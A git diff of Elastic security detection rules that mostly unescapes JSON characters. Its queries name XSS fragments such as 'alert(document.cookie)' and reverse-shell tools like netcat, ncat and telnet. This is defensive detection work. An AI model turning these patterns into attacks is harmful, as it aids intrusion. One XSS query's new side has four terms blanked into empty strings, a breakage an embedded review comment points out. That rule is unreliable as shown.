+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -78,7 +78,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json
index f3827b2de18..f1ca05f7430 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json
index 2dc3970c156..6a2dcc25510 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json b/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json
index 2366d025af7..becb8e7ebec 100644
--- a/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Cross Site Scripting (XSS)",
- "query": "any where processor.name == \"transaction\" and\nurl.fragment : (\"\u003ciframe*\", \"*prompt(*)*\", \"\u003cscript*\u003e\", \"\u003csvg*\u003e\", \"*onerror=*\", \"*javascript*alert*\", \"*eval*(*)*\", \"*onclick=*\",\n\"*alert(document.cookie)*\", \"*alert(document.domain)*\",\"*onresize=*\",\"*onload=*\",\"*onmouseover=*\")\n",
+ "query": "any where processor.name == \"transaction\" and\nurl.fragment : (\"\", \"\", \"*onerror=*\", \"*javascript*alert*\", \"*eval*(*)*\", \"*onclick=*\",\n\"*alert(document.cookie)*\", \"*alert(document.domain)*\",\"*onresize=*\",\"*onload=*\",\"*onmouseover=*\")\n",
 "references": [
 "https://github.com/payloadbox/xss-payload-list"
 ],
@@ -46,7 +46,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json
index 9b687688335..ae1482a0c40 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json
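Review bot: The new-side `"query"` in the `@@ -14,7 +14,7 @@` hunk loses four of its `url.fragment` terms: `"\u003ciframe*"`, `"*prompt(*)*"`, `"\u003cscript*\u003e"` and `"\u003csvg*\u003e"` on the old side become `"", ""` on the new side, so the rule no longer matches tag-based or `prompt(` fragments and carries two empty wildcard terms instead. The shape of the loss (everything from the first `<` to the next `>`, twice) is what an HTML tag stripper would do to the unescaped text, so this may be an artifact of how the page was rendered rather than of the commit itself; it should be checked against the raw file before merging, but as shown it is a detection regression for the only rule in this diff whose content changed beyond `\u0026`/`\u003e` unescaping. The `+` line should read `url.fragment : ("<iframe*", "*prompt(*)*", "<script*>", "<svg*>", "*onerror=*", ...` with the remaining terms unchanged, and the package's rule validation could reject any query whose list contains an empty term `""` so an unescape step cannot silently blank a pattern again.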
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and 
\n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json index 4c99744975e..57f218a6003 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) 
or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json index d4ed703a72c..4178ee82731 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") 
and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json index 874dff9bca5..66542e7f273 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json 
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Reverse Shell via Suspicious Parent Process",
- "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n",
+ "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n",
 "references": [
 "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
 ],
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -107,7 +107,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json
index f5700945055..844fdde6ec8 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json
@@ -12,7 +12,7 @@
 "license": "Elastic License v2",
 "name": "Deprecated - Potential Reverse Shell via Suspicious Parent Process",
 "note": "This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule.",
- "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n",
+ "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n",
 "references": [
 "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
 ],
@@ -87,7 +87,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -109,7 +109,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json
index 50aa0ab3195..a71f0f0bfe2 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json
@@ -12,7 +12,7 @@
 "license": "Elastic License v2",
 "name": "Deprecated - Potential Reverse Shell via Suspicious Parent Process",
 "note": "This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule.",
- "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n",
+ "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n",
 "references": [
 "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
 ],
@@ -87,7 +87,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -109,7 +109,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json
index 71296115f79..e4eafeff9d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json
index 73ece375def..627c0cedc5b 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json
index 730cf4168ff..1dee1636186 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json
index 3b6a0c97c60..79f0b508b82 100644
